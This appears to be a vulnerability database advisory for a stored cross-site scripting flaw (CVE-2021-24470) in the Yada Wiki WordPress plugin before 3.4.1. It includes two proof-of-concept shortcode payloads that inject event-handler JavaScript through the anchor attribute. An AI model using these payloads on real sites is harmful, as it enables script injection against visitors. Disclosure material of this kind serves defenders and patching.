Yada Wiki < 3.4.1 – Contributor+ Stored XSS | CVE 2021-24470 | Plugin Vulnerabilities

Description

The plugin did not sanitise, validate or escape the anchor attribute of its shortcode, leading to a Stored Cross-Site Scripting issue

Proof of Concept

- Create a wiki page. If there is already a page, you can skip. The page can be a draft.
- Add this shortcode to a post/page, view it and move the mouse over the 'XSS' link to trigger the XSS [yadawiki link="PAGE_NAME_HERE" anchor='" onmouseover="alert(/XSS/)' show="xss"]

If the theme used is TwentyTwentyOne, the following payload can be used: [yadawiki link="PAGE_NAME_HERE" anchor='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1)' show="xss"]

Affects Plugins

Fixed in 3.4.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

b01a85cc-0e45-4183-a916-19476354d5d4

Timeline

Publicly Published

2021-06-28 (about 2 years ago)

Added

2021-06-28 (about 2 years ago)

Last Updated

2022-01-02 (about 2 years ago)

Other

Published

Title

Published

2021-07-30

Title

youForms for WordPress <= 1.0.5 - Authenticated Stored Cross-Site Scripting

Published

2022-04-19

Title

Bulk Edit and Create User Profiles < 1.5.14 - Admin+ Stored Cross-Site Scripting

Published

2021-08-13

Title

Plugmatter Pricing Table Lite <= 1.0.32 - Reflected Cross-Site Scripting

Published

2021-10-13

Title

Testimonial Builder < 1.6.0 - Admin+ Stored Cross-Site Scripting

Published

2021-10-11

Title

WP Header Images < 2.0.1 - Reflected Cross-Site Scripting